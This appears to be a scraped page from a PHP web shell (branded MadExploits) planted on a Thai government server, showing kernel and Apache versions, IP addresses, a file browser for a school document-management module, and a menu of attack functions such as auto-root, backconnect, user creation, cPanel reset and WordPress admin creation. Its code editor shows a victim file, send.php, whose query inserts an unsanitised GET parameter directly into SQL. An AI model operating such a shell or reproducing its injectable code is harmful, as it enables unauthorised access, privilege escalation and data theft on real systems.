Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
bookpv /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
bookobec_detail.php
5.17
KB
-rw-r--r--
receive.php
553
B
-rw-r--r--
receive_other.php
508
B
-rw-r--r--
receive_other2.php
537
B
-rw-r--r--
receive_register.php
8.66
KB
-rw-r--r--
send.php
1.19
KB
-rw-r--r--
send_report.php
505
B
-rw-r--r--
sync_code.php
2.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : send.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); if(!($result_permission['p2_book']==1)){ echo "<div align='center' class='tagline2'>"; echo "<br>"; echo "คุณไม่ได้รับสิทธิ์ส่งหนังสือ"; echo "</div>"; exit(); } $sql = "select * from bookpv_sync"; $dbquery = mysqli_query($connect,$sql); $result = mysqli_fetch_array($dbquery); $sync_code=md5($result['sync_code']); $url=($result['pmss_url']); if(isset($_GET['from_register'])){ $sql_register="select * from bookregister_send where ms_id='$_GET[id]' "; $dbquery_register = mysqli_query($connect,$sql_register); $result_ref = mysqli_fetch_array($dbquery_register); echo "<iframe src='$url/modules/book/book_area/send_book.php?sync_code=$sync_code&person=$_SESSION[login_user_id]&book_no=$result_ref[book_no]&subject=$result_ref[subject]&sign_date=$result_ref[signdate]' height='500' width='100%'></iframe>"; } else{ echo "<iframe src='$url/modules/book/book_area/send_book.php?sync_code=$sync_code&person=$_SESSION[login_user_id]' height='500' width='100%'></iframe>"; } ?>
Close